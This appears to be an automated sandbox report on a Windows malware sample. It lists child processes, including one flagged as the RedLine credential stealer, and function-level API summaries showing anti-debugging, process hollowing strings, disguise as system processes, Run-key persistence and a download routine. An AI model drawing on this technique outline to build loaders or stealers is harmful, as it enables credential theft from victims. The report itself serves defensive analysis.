Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	19:37:47
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\svchost.exe"
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	19:37:47
Start date:	12/12/2024
Path:	C:\Windows\System32\audiodg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\audiodg.exe"
Imagebase:	0x7ff7a91b0000
File size:	632'808 bytes
MD5 hash:	627DEA21175691FDE4495877C53B4C87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	19:37:47
Start date:	12/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\msiexec.exe"
Imagebase:	0x7ff7179d0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	19:37:54
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\10000830101\update.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\10000830101\update.exe"
Imagebase:	0x7ff7f7540000
File size:	308'224 bytes
MD5 hash:	DD1E3F38AE7711D270748012AF613950
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	19:37:54
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\svchost.exe"
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	19:37:54
Start date:	12/12/2024
Path:	C:\Windows\System32\audiodg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\audiodg.exe"
Imagebase:	0x7ff7a91b0000
File size:	632'808 bytes
MD5 hash:	627DEA21175691FDE4495877C53B4C87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	19:37:54
Start date:	12/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\msiexec.exe"
Imagebase:	0x7ff7179d0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	19:38:01
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe"
Imagebase:	0xef0000
File size:	307'712 bytes
MD5 hash:	7B6730CA4DA283A35C41B831B9567F15
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3006898229.00000000034C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	41.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50.3%
Total number of Nodes:	483
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF79E382048 Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF79E3820AD

Strings

ntdll, xrefs: 00007FF79E382399
NtUnmapViewOfSection, xrefs: 00007FF79E3823AE
@, xrefs: 00007FF79E382429
.reloc, xrefs: 00007FF79E38264F

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: FileModuleName
String ID: .reloc$@$NtUnmapViewOfSection$ntdll
API String ID: 514040917-3001742581
Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
Instruction ID: 369c8795aa68b66d20d67513a098d9e22057c890c3eb3eaf8e6d8a6151349329
Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
Instruction Fuzzy Hash: F732C93261CAC586D774DB26E8947AAB3A1FBC9B84F404139DA8D83B58DF7CD444CB20

Function 00007FF79E38345C Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF79E38321C: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00007FF79E38346D), ref: 00007FF79E383220

ExitProcess.KERNEL32 ref: 00007FF79E383476
ExitProcess.KERNEL32 ref: 00007FF79E3834D4

Strings

worker_BAccdq, xrefs: 00007FF79E383510
msiexec.exe, xrefs: 00007FF79E3834FB
svchost.exe, xrefs: 00007FF79E383497
audiodg.exe, xrefs: 00007FF79E38354C
worker_FDhvwc, xrefs: 00007FF79E3835CD
worker_kBEqZh, xrefs: 00007FF79E383561
worker_RdDwvE, xrefs: 00007FF79E3834BF

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: ExitProcess$DebuggerPresent
String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
API String ID: 613740775-1953711635
Opcode ID: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
Instruction ID: 2cb6ea04600ea2e6fddbef7c521bc1e98f5fff0a7ca09a6b1eea770f3f90951a
Opcode Fuzzy Hash: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
Instruction Fuzzy Hash: C861FA30A1CA4391FB74BB31E8D52BEA2A1BF94741FD0413ED45E866E6DE6DE4098730

Function 00007FF79E384264 Relevance: 10.6, APIs: 7, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383481), ref: 00007FF79E384268
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383481), ref: 00007FF79E38427B
GetTokenInformation.KERNELBASE ref: 00007FF79E3842AC
GetTokenInformation.KERNELBASE ref: 00007FF79E3842DE
CloseHandle.KERNEL32 ref: 00007FF79E3842ED

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: Token$InformationProcess$CloseCurrentHandleOpen
String ID:
API String ID: 434396405-0
Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
Instruction ID: f2644199580ae3817c01c8c8a36d6630df44c7c82e66e898f314d47b44282d07
Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
Instruction Fuzzy Hash: D431193261CA8186D760EB25E49072EF7A0FBD4B90F505139FA8E83B68DF7CD4418B20

Function 00007FF79E38321C Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00007FF79E38346D), ref: 00007FF79E383220
GetCurrentProcess.KERNEL32 ref: 00007FF79E383236
CheckRemoteDebuggerPresent.KERNELBASE ref: 00007FF79E383244

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: DebuggerPresent$CheckCurrentProcessRemote
String ID:
API String ID: 3920101602-0
Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
Instruction ID: 36b0a1b9f60c03f2638d78677e9b0b06801eb7d4e396eb5b73679280de3d519b
Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
Instruction Fuzzy Hash: 1CF0822090C28281F774AB75E484379E790BF55B08F80017CD98D46795DF6CE509DB31

Function 00007FF79E381050 Relevance: 3.0, APIs: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00007FF79E381063
GetProcAddress.KERNEL32 ref: 00007FF79E381078

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
Instruction ID: 883637d760fc59d1f34f8c82078a7220b8016c8db8e1eac40746efaadd55e39b
Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
Instruction Fuzzy Hash: 68E09276508F8086C620EB15F88001AB7B4FBC8794FA04129EACD82B28DF3CC169CB10

Function 00007FF79E3838C4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF79E383744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF79E383784
Part of subcall function 00007FF79E383744: GetVolumeInformationW.KERNELBASE ref: 00007FF79E383801
Part of subcall function 00007FF79E383744: wsprintfW.USER32 ref: 00007FF79E3838A2

SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38390D
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383922
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383935
CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383945
SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383958
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38396D
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383980
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383995

Strings

.exe, xrefs: 00007FF79E383986

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
String ID: .exe
API String ID: 1846285901-4119554291
Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
Instruction ID: c1eb9984d21fd426991567ab7f4649977ebc8caa60f08438d227ae40bcfd0702
Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
Instruction Fuzzy Hash: 1F116A3161898282DB70EF35F89476AA362FBC4B80F805039D94E83E29DE7CD115C760

Function 00007FF79E383A74 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF79E383744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF79E383784
Part of subcall function 00007FF79E383744: GetVolumeInformationW.KERNELBASE ref: 00007FF79E383801
Part of subcall function 00007FF79E383744: wsprintfW.USER32 ref: 00007FF79E3838A2

Part of subcall function 00007FF79E3838C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38390D
Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383922
Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383935
Part of subcall function 00007FF79E3838C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383945
Part of subcall function 00007FF79E3838C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383958
Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38396D
Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383980
Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383995

GetModuleFileNameW.KERNEL32 ref: 00007FF79E383AB9
DeleteFileW.KERNELBASE ref: 00007FF79E383AC4
CopyFileW.KERNELBASE ref: 00007FF79E383ADD
SetFileAttributesW.KERNELBASE ref: 00007FF79E383AF5

Strings

Services, xrefs: 00007FF79E383B00

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
String ID: Services
API String ID: 3209240227-2319745855
Opcode ID: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
Instruction ID: a328806d127c6a8af0ca2819e916a440b8aa48905cb98354049942cb4042b89e
Opcode Fuzzy Hash: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
Instruction Fuzzy Hash: 2F014461A1858292EB70EB34E4D43AAD361FB94744FD0543ED65D836A9EE2CD24ECB20

Function 00007FF79E383744 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32 ref: 00007FF79E383784
GetVolumeInformationW.KERNELBASE ref: 00007FF79E383801
wsprintfW.USER32 ref: 00007FF79E3838A2

Strings

%08lX%04lX%lu, xrefs: 00007FF79E383893

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: DirectoryInformationVolumeWindowswsprintf
String ID: %08lX%04lX%lu
API String ID: 3001812590-640692576
Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
Instruction ID: 1f3b3bc772ebd0d8fe16d59123dc7dda022dfa7397abd4d306415672de3c12ac
Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
Instruction Fuzzy Hash: 7031E92661C6C1C6DB30EB74E4983AAB3A0FB94744F90113AE68D87A59DB7DD509CB20

Function 00007FF79E3839B4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF79E383B0C), ref: 00007FF79E3839E4
RegSetValueExW.KERNELBASE ref: 00007FF79E383A39
RegCloseKey.ADVAPI32 ref: 00007FF79E383A48

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF79E3839D6

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: CloseOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 779948276-1428018034
Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
Instruction ID: 8cc0dc305db122fd82bbe90feb371b2a4c6c6cbcf3e5bc5baee5038da7be6800
Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
Instruction Fuzzy Hash: B711363551874086D7A09B64F48466AB7A0FB847A0F505339F96E43BE8DF7CD145CB10

Function 00007FF79E383B24 Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE ref: 00007FF79E383B42

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
Instruction ID: 742b56879350ddbe4bebf6f528756955a393c4dc161fec6b2645ee92e072ea0f
Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
Instruction Fuzzy Hash: D6D01221E3894181E7A5EB36E8C9719E3A1FBC4B44FC0803DE68981A68CF3CC1998F10

Function 00007FF79E383B54 Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FF79E383B70

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
Instruction ID: b48659ed3f4f3b58b7e51f2d6ed5b12f84a1bdc8996fa092cee2866a5d84e8af
Opcode Fuzzy Hash: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
Instruction Fuzzy Hash: 93C08CB1F26180C3DB2CEF32E491F0B6A21B784B40F90802CEA0287B84C93EC2528F00

Non-executed Functions

Function 00007FF79E381CDC Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FF79E381D20
Sleep.KERNEL32 ref: 00007FF79E381D38
InternetOpenUrlW.WININET ref: 00007FF79E381D64
InternetOpenUrlW.WININET ref: 00007FF79E381D9B
InternetCloseHandle.WININET ref: 00007FF79E381DB3
Sleep.KERNEL32 ref: 00007FF79E381DBE
HttpQueryInfoA.WININET ref: 00007FF79E381DEE
InternetCloseHandle.WININET ref: 00007FF79E381DFD
InternetCloseHandle.WININET ref: 00007FF79E381E08
Sleep.KERNEL32 ref: 00007FF79E381E13
InternetCloseHandle.WININET ref: 00007FF79E381E2D
InternetOpenUrlW.WININET ref: 00007FF79E381E57
InternetCloseHandle.WININET ref: 00007FF79E381E6F
Sleep.KERNEL32 ref: 00007FF79E381E7A
HttpQueryInfoA.WININET ref: 00007FF79E381EB2
GetProcessHeap.KERNEL32 ref: 00007FF79E381EC1
RtlAllocateHeap.NTDLL ref: 00007FF79E381ED7
InternetCloseHandle.WININET ref: 00007FF79E381EEF
InternetCloseHandle.WININET ref: 00007FF79E381EFA
InternetReadFile.WININET ref: 00007FF79E381F37
InternetCloseHandle.WININET ref: 00007FF79E381F6D
InternetCloseHandle.WININET ref: 00007FF79E381F78

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF79E381D19

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
API String ID: 2307068205-2771526726
Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
Instruction ID: d1fc5bc903f9c0e70c17b1db281cec73c3a2c1abd796d1d0b946c8ae356a0408
Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
Instruction Fuzzy Hash: 7771E936518A8182E760EB64F49476AF7A1FBC4795F90103DFA8E83A68CF7CD5448B20

Function 00007FF79E3840E4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF79E38414B
